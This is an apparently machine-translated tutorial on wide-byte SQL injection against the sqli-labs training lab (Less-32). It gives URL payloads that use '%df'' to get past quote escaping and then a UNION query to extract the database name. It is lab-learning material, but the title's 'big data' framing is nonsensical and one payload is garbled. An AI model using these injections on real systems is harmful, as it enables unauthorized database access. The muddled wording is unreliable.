How to parse wide byte injection in big data
This article is about how to analyze wide byte injection in big data. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it with the editor.
Environment sqli-labs
Less 32
First, enter special characters, all of which are escaped
Http://192.168.1.121/sqli/Less-32/?id=1\
Http://192.168.1.121/sqli/Less-32/?id=1'
Http://192.168.1.121/sqli/Less-32/?id=1''
Second, construct wide byte closure
Http://192.168.1.121/sqli/Less-32/?id=1%df'-- +
Theoretically,% 81-%FE is all right.
Third, joint query database
Http://192.168.1.121/sqli/Less-32/?id=-1%df' union select 1 database (), 3-- +
This is how big data parses wide byte injection. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.